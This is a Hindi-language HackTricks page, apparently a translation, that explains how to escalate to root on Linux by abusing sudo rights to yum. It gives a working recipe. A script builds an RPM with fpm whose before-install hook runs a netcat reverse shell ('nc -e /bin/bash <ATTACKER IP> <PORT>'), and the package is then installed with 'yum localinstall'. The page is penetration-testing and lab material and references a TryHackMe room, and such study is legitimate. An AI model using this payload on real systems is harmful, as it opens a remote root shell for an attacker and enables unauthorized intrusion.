hacktricks/linux-unix/privilege-escalation/exploiting-yum.md

6.7 KiB

AWS हैकिंग सीखें शून्य से लेकर हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!

HackTricks का समर्थन करने के अन्य तरीके:

yum के आसपास के और उदाहरण gtfobins पर भी पाए जा सकते हैं।

RPM पैकेज के माध्यम से मनमाने कमांड्स को निष्पादित करना

पर्यावरण की जांच

इस वेक्टर का लाभ उठाने के लिए उपयोगकर्ता को उच्च विशेषाधिकार वाले उपयोगकर्ता, जैसे कि root, के रूप में yum कमांड्स निष्पादित करने में सक्षम होना चाहिए।

इस वेक्टर का एक काम करने वाला उदाहरण

इस एक्सप्लॉइट का एक काम करने वाला उदाहरण daily bugle रूम में tryhackme पर पाया जा सकता है।

एक RPM पैक करना

निम्नलिखित खंड में, मैं fpm का उपयोग करके एक RPM में रिवर्स शेल को पैकेज करने की प्रक्रिया को कवर करूंगा।

नीचे दिया गया उदाहरण एक पैकेज बनाता है जिसमें एक before-install ट्रिगर शामिल होता है जिसमें एक मनमानी स्क्रिप्ट होती है जिसे हमलावर द्वारा परिभाषित किया जा सकता है। जब इंस्टॉल किया जाता है, यह पैकेज मनमाने कमांड को निष्पादित करेगा। मैंने प्रदर्शन के लिए एक साधारण रिवर्स नेटकैट शेल उदाहरण का उपयोग किया है, लेकिन इसे आवश्यकता के अनुसार बदला जा सकता है।

EXPLOITDIR=$(mktemp -d)
CMD='nc -e /bin/bash <ATTACKER IP> <PORT>'
RPMNAME="exploited"
echo $CMD > $EXPLOITDIR/beforeinstall.sh
fpm -n $RPMNAME -s dir -t rpm -a all --before-install $EXPLOITDIR/beforeinstall.sh $EXPLOITDIR

शेल प्राप्त करना

ऊपर दिए गए उदाहरण का उपयोग करते हुए और मान लें कि yum को उच्च-विशेषाधिकार प्राप्त उपयोगकर्ता के रूप में निष्पादित किया जा सकता है।

  1. होस्ट पर rpm ट्रांसफर करें
  2. अपने स्थानीय होस्ट पर एक लिसनर शुरू करें जैसे कि नेटकैट लिसनर का उदाहरण
  3. वल्नरेबल पैकेज इंस्टॉल करें yum localinstall -y exploited-1.0-1.noarch.rpm
AWS हैकिंग सीखें शून्य से लेकर हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!

HackTricks का समर्थन करने के अन्य तरीके: